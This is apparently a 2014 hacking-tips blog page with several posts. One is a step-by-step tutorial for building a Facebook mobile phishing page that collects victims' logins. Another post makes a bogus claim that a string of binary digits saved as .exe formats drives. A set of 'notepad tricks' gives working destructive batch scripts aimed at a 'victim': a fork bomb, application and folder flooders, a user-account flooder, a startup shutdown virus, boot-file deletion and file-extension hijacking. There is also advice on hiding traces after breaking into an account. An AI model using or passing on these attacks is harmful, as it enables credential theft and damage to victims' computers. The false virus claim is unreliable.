ABOUT US

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

COMPUTER

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

HACKING

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

DOWNLOADS

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

TIPS AND TRICKS

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

TUTORIALS

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

OTHER STUFFS

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

Wednesday, April 30, 2014

Phishing Method Facebook Mobile Hacking using Wapka.

Phishing Method Facebook Mobile Hacking using Wapka [undetectable].

What is Phishing ?
Phishing is a way of deceiving your victim by making him login through one of your webpages which is a copy of the original one. By doing so the fake webpage will save his E-mail ID or username and password. This is used for criminal activities for stealing Credits Cards and So on.
Now we are going to make a fake login page of Facebook Mobile.
Lets start the tutorial...
Step 1: Register a new Wapka Account
First create a new wapka account from the link below.

Step 2: Editing Wapka Texts
Login to your Wapka account. Goto Settings>Edit text> Forum/chat and change the following words,
Name: Email or Phone
Text: Password
Submit: Log In
It's shown in the screenshot below.
Click 'Edit' to save and Login to your account in ADMIN mode.
Step 3: Create a new forum
Create a new forum to save all hacked usernames and passwords in your site.
You can do it by Edit Site>Forum
Get inside your newly created forum and note down its Forum ID. You can find it at the right bottom corner of the forum. Its shown below.

Step 4: Change Forum Visibility
The forum we create above will be visible to everyone. Now we have to change its visiblity, so that admin can only view the hacked usernames and passwords.
You can do it by Edit site>Users>Items visibility
Mark 'X' to make it visible only in admin mode.

Step 5: Uploading Facebook Mobile Phisher Page Source Code
Just copy and paste the code below in your site.
You can add it by Edit site>WML/HTML code
Note: But before pasting, edit the code and replace 'XXXXXXX' with your Forum ID( as you found it in step 4) and remove spaces in small form tag.
Now you can see your fully designed facebook phishing page.
But there'll be only one filed instead of 'Email or Phone' and 'Password' fields.
Don't worry, wapka won't ask usernames when you are logged in.
So just logout your admin mode or open your site url in a new tab. You'll see a page like this.
* You can find all hacked usernames and passwords in the forum by logging in as ADMIN.
Now use your social engineering skill to make the vitim to login in your site. You can send him a message with your link.
Disclaimer: DO NOT use this for fraudulent activities use this just to gain knowledge and not to cause harm to other people in any sort.
By trying this trick, you'll surely learn the basics of Hacking, HTML and Wapka.
If you got any problem, then describe the problem in comments below...

Earn money by  AdSense   click here and SignUp 

Tuesday, April 29, 2014

Create Binary Virus To Format Hard Disk

Create Binary Virus To Format Hard Disk.

1. Copy the below codes into Notepad.

01001011000111110010010101010101010000011111100000

2. Save the file as Format.exe

3. You just created virus to format Hard Drive. Enjoy !!!
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Saturday, April 26, 2014

Ethical Hacking Basics: Here Are 10 Awesome SSH Hacks.

Ethical Hacking Basics: Here Are 10 Awesome SSH Hacks.


Secure Shell (SSH) is widely used by network administrators to control Web and other kinds of servers remotely. The UNIX-based command interface and protocol can also be used to tunnel your traffic, transfer files, mount remote file systems, and much more. We have compiled here a list of 10 awesome SSH Hacks.

1.Giving SSH keys unique names

Particularly useful when you're administering a number of remote computers. You can name the SSH keys anything you want.

2.Putting long commands in text files

In this way you can use your long command to log in and run on a remote PC:

xyz@local:~$ ssh user@remotehost "'cat filename.txt'"

Do not use fancy quotations copied from some Web page. Use back-ticks instead of single apostrophes.

3.Logging in and running a command in one step

When powering off a remote computer for instance, you can log in and run the command in one step:

xyz@local:~$ ssh user@remotehost sudo poweroff

4.Launching a remote screen session

This is how you do it:

host1 ~ $ ssh -t user@host2 /usr/bin/screen -xRR

5.Viewing all fingerprints and randomart images in known_hosts

View them all in your ~/.ssh/known_hosts file:

$ ssh-keygen -lvf ~/.ssh/known_hosts

6.Retrieving the fingerprint and randomart image of an SSH key

Here's how you do it:

$ ssh-keygen -lvf keyname

7.Logging in with server-specific keys

Here's how you do it:

$ ssh -i .ssh/web-admin.pub user@webserver

8.Fast easy known_hosts key management

Here's how you can do it:

$ ssh-keygen -R remote-hostname

9.Reading public key comments

Here's how you can do it:

$ less .ssh/web-admin.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1

[snip] KCLAqwTv8rhp downtown lan webserver

10.Giving SSH keys informative comments

Here's how you can do it:

$ ssh-keygen -t rsa -C "downtown lan webserver" -f .ssh/web-admin

Here are 20 ways to become a better Ethical Hacker.

Here are 20 ways to become a better ethical hacker:



1. Learning scripting languages such as Python, Perl and ruby is highly advisable. This in turn will help you in automating your tasks while also improving your skills. 

2. Good ethical hackers need to know and ynderstand all possible user inputs to stay ahead in their game.

3. Ok, so you have successfully gained access to someone's account! Pat your back soldier, but that doesn't mean you're good. A good hacker would ensure he/she does not leave behind any trail whatsoever. Take note and don't alter a thing, simply watch and fetch the relevant information you seek and off you go!

4. You know that thing about traveling and the art to discover new possibilities? Well, the same rules apply for any good hacker as well. Traveling to uncharted shores will make you better!

5. Google has been nothing short of a revelation for the world. Anything you need, is there at just a click of the mouse. Ethical hackers must not shy away from using either Google or resources like exploit-db to stay well ahead when it comes to all the information regarding various versions and bugs of your potential target. This would ensure you're up to date with the kind of versions that might be possibly used on a target website, thereby knowing everything about the possible vulnerabilities and their potential exploitation.

6. Man pages are in abundance out there. These online software documentations usually found on a Unix or Unix-like operating system have all the necessary information you need. A thoroughly informed hacker will obviously ask well informed questions.

7. Writing open source programs is both healthy and highly effective. Try out Linux and all its goodness. Programming Languages like C, Pearl, Lisp, Java and Html are there for help, and they are awesome!

8. While a personal interest in computers is quite an obvious, a good ethical hacker will take things one at a time rather than taking it all up from the word go and being frustrated at the end. Theory must be followed by practice. There are tutorials, yes, but avoid following them blindly. Watch tutorials only when you're stuck and need to take points.

9. Before plunging into programs like BACKTRACK, METASPLOIT etc, learn how old hackers did it. Start from scratch, learn manual hacking, coding one day at a time. And in time you'll be the master of your trade!

10. Rather than blindly relying on tricks, go for deeper understanding without rushing into topics, Remember, "Slow and Steady wins the race".

11. Don't ever be shy of asking. Go on and join various hacking groups and forums. This will not only help you ask fellow hackers but also keep you updated with latest hacking news.

12. Ok, if you don't know the basic difference between a scripting language and a programming language, you need to seriously reconsider what you're doing with your life! Well, if you do know the difference, proceed to understand what programming language to use when. Don't waste your time writing something that could have been completed way faster.

13. If you thought hacking was some sorcerer's magic, well you're sadly mistaken! It takes way lot of time, that could be mentally challenging. Remember, there is no shortcut in this game. Plan your every step carefully and link them carefully for effective execution.

14. "Sweat more in practice, so you bleed less in war!" Do I really need to explain that?

15. While testing, start with the basic stuff, and in case you don't know them, well better start learning!

16. You must remember: the more you enumerate, the more attack surface will be avaialable to feast upon.

17. You must be thorough with all the different protocols before diving in. Read the RFCs carefully in order to have a clear understanding of how these work and also in case there are any security by design issues. Understand your context next, then develop an exploit accordingly.

18. Burn the midnight oil. Learn, think, try, fail, try again!

19. Well, if you think you're the best, think again! Be your on competitor rather than going after some selfish wish to rule the world and stuff! Remember, there's always going to be a new vulnerabilty round the corner to be exploited, it might be you or somebody else! The important thing is to keep on learning.

20. Do you know your system inside out? Well, it's high time you do! You simply can't be a better hacker if you're not pretty sure of your own system.

Learn Hacker's Language (l337)

The language in which hackers communicate between themselves is known as LEET(l337) also known as ELEET or LEETSPEAK. Its an alternative alphabet for the English language that is used primarily on the internet. It's a combination of alphabets, numbers and symbols and is very famous in Hacking world...
leet was made by hackers in 1990s to hide their web pages from search engines.
Here's a chart which can help you learning leet language.


A = 4 @ /-\ /\ ^ aye ∂ ci λ Z
B = 8 |3 6 13 |3 ß ]3
C = ( < ¢ { © sea see
D = |) [) ∂ ]) I> |> 0 ð cl
E = 3 £ & € [- ə
F = |= ]= } ph (= ʃ
G = 6 9 & (_+ C- gee jee (γ, cj
H = |-| # ]-[ [-] )-( (-) :-: }{ }-{ aych
I = ! 1 | eye 3y3 ai ¡
J = _| _/ ] ¿ </ _) ʝ
K = X |< |X |{ ɮ
L = 1 7 |_ £ | |_ lJ ¬
M = 44 /\/\ |\/| em |v| IYI IVI [V] ^^ nn //\\//\\ (V) (\/) /|\ /|/| .\\ /^^\ /V\ |^^| AA
N = |\| /\/ //\\// И [\] <\> {\} // ₪ []\[] ]\[ ~
O = 0 () oh [] ¤ Ω
P = |* |o |º |> |" ? 9 []D |7 q þ ¶ ℗ |D
Q = 0_ 0, (,) <| cue 9 ¶
R = |2 2 /2 I2 |^ |~ lz ® |2 [z |` l2 Я .- ʁ
S = 5 $ z § es
T = 7 + -|- 1 '][' †
U = |_| (_) Y3W M µ [_] \_/ \_\ /_/
V = \/ √ \\//
W = \/\/ vv '// \\' \^/ (n) \X/ \|/ \_|_/ \\//\\// \_:_/ ]I[ UU Ш ɰ ₩ JL
X = % >< Ж }{ ecks × * )( ex
Y = j `/ `( -/ '/ Ψ φ λ Ч ¥
Z = 2 ≥ ~/_ % ʒ 7_


Please note this table is to be used as a guide and not a full translation tool. Leet is ever-changing and not all replacements will, or can, be included.


Vocabulary

Although l33t speak is just a corrupted form of the English language, there are many phrases and words (spellings) that are unique to it.

0w|\| or 0wn3d - One of the most popular l33t words it is very loosely defined as beaten or can simply be an expression of awe, for example, 'I 0wn3d you' means 'I have beaten you in a very humiliating fashion', or '0wn4ge!' which means 'That was (or is) very nifty'.
w00t - Derived from 'hoot', this is defined as 'yay', it can be used, for example, upon victory or, possibly, the release and procurement of a new video card.
13wt - Treasure, good merchandise, possessions, a misspelling of loot. Most commonly referring to pirated software, items in a game or promotional giveaways.
h4x0r - Hacker, can be used for a real hacker or simply a very skillful person. This is the most common occurrence of the -0r clause.
ph33r - Fear, most commonly used in such phrases as, 'Ph33r m3!' or 'Ph33r |\/|y 1337 sk1llz!' It can also be written as, 'ph34r'.
sk1llz - Obviously derived from 'skill', referring to skill in some type of online game, programming or hacking. Many times used in conjunction with 'm4d'. As a general rule, if one has sk1llz, one is to be ph33r3d.
m4d - Mad, mostly used as a descriptive term meaning great, for example, 'h3s g0t m4d sk1llz'.
j00 - You, commonly used in such phrases as, 'j00 d34d f00'.
f00 - Fool, one who isn't very bright or skillful.
j0 - Yo, as in the greeting.
d00d - Dude; an expression of comrade, or just used to address a random person online.
sux0r - Sucks, as in '7h1s sux0r', one of the few common examples of the -0r clause.
l4m3r - Lamer, someone who is lame, someone who uses an unfair tactic or generally makes the things around him or her less fun.
n00b - Short for noobie, misspelling of newbie; someone who is new to something, or just not very good at it.
GOOGLE IN LEET LANGUAGE:
There's also google in Hacker's language(l337) .

AWESOME NOTEPAD TRICKS.


Welcome , let's learn some cool and awesome notepad tricks which you can enjoy

1)To make your pc talk


Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.

It will prompt you for a text when u open the file, input the text and press ok."
u will hear now what u typed..

2)Popping CD Drives

This will make the CD drives constantly pop out

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

3)Endless Notepads

This will pop up endless notepads until the computer freezes and crashes
**Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

 Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword 
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

3) Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

4) User account flooder
@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

5) Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

6) Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

7) Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

8) Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

9) 
How To Make Keyboard LED Dance ?

*Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

* Then save this file as led.vbs (.vbs is must)

* Open your save file and see your keyboard led blinking like disco lights.

How To Disable Blinking LED ?

* First open Task Manager (ctrl+alt+del)
* Then Go to process tab.
* Select wscript.exe
* Click on End process.